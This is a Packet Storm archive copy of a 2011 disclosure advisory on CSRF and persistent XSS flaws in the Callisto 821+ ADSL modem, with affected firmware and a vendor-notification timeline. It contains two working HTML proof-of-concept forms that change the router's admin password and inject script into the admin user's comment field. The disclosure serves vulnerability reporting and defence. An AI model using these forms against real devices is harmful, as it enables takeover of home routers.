what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Callisto 821+ Cross Site Request Forgery / Cross Site Scripting

Callisto 821+ Cross Site Request Forgery / Cross Site Scripting
Posted May 30, 2011
Authored by MustLive

Callisto 821+ ADSL modems suffer from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 0e16cf1eb86fda073d42b60cae20ced062f3ed4454b91874e9820d5bfad4540b

Callisto 821+ Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
Hello list!

I want to warn you about security vulnerabilities in ADSL modem Callisto
821+ (SI2000 Callisto821+ Router).

These are Cross-Site Request Forgery and Cross-Site Scripting
vulnerabilities. In April I've already drew attention of Ukrtelecom's
representative (and this modem was bough at Ukrtelecom) about multiple
vulnerabilities in this model of Callisto modems (and other models also
could be affected).

SecurityVulns ID: 11700.

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: SI2000 Callisto821+ Router: X7821 Annex A
v1.0.0.0 / Argon 4x1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. This model with other
firmware and also other models of Callisto also must be vulnerable.

----------
Details:
----------

These attacks should be conducted on modem owner, which is logged into
control panel. Taking into account that it's unlikely to catch him in this
state, then it's possible to use before-mentioned vulnerabilities
(http://websecurity.com.ua/5161/) for conducting of remote login (for
logining him into control panel). After that it's possible to conduct CSRF
or XSS attack.

CSRF (WASC-09):

This vulnerability allows to change password of default user.

http://websecurity.com.ua/uploads/2011/Callisto%20821+%20CSRF.html

<html>
<head>
<title>Callisto 821+ CSRF exploit (C) 2011 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://192.168.1.1/configuration/auth_edit_user.html/edit" method="post">
<input type="hidden" name="EmWeb_ns:vim:3" value="/configuration/authentication.html">
<input type="hidden" name="EmWeb_ns:vim:2.ImUsers.qe1dg7bm:password" value="password">
<input type="hidden" name="EmWeb_ns:vim:2.ImUsers.qe1dg7bm:mayConfigure" value="true">
<input type="hidden" name="EmWeb_ns:vim:2.ImUsers.qe1dg7bm:comment" value="Default admin user">
</form>
</body>
</html>


XSS (WASC-08):

In this form there are also two persistent XSS vulnerabilities.

http://websecurity.com.ua/uploads/2011/Callisto%20821+%20XSS.html

<html>
<head>
<title>Callisto 821+ XSS exploit (C) 2011 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://192.168.1.1/configuration/auth_edit_user.html/edit" method="post">
<input type="hidden" name="EmWeb_ns:vim:3" value="/configuration/authentication.html">
<input type="hidden" name="EmWeb_ns:vim:2.ImUsers.qe1dg7bm:password" value="password">
<input type="hidden" name="EmWeb_ns:vim:2.ImUsers.qe1dg7bm:mayConfigure" value="true">
<input type="hidden" name="EmWeb_ns:vim:2.ImUsers.qe1dg7bm:comment" value="<script>alert(document.cookie)</script>">
</form>
</body>
</html>

In this case the code will be executed immediately, and also at visiting of
pages http://192.168.1.1/system/events.html and
http://192.168.1.1/shared/event_log_selection.html.

http://websecurity.com.ua/uploads/2011/Callisto%20821+%20XSS2.html

In this case the code will be executed immediately, and also at visiting of
page http://192.168.1.1/configuration/authentication.html.

------------
Timeline:
------------

2011.04.14 - informed Ukrtelecom about multiple vulnerabilities in modems,
which they give (sell) to their clients.
2011.05.25 - disclosed at my site.
2011.05.26 - informed developers (Iskratel).

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/5165/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    38 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close